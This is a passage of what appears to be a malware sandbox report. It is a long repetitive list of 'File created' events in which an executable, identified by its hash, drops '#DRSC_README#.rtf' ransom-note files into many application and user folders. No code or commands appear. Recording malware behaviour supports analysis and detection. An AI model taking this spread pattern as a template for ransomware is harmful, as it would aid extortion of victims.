DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{921a8e1d-4684-4256-adbb-25f4fc1b971f}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\af\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quz-PE\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iq5q997v.default-release\storage\default\moz-extension+++14e17733-b312-4a06-a43e-1f8eab5cb32e^userContextId=4294967295\idb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-CN\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-CN\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\Windows Live\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\da\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-PT\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sd-Arab-PK\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ta\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-US\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Music\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tg\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created 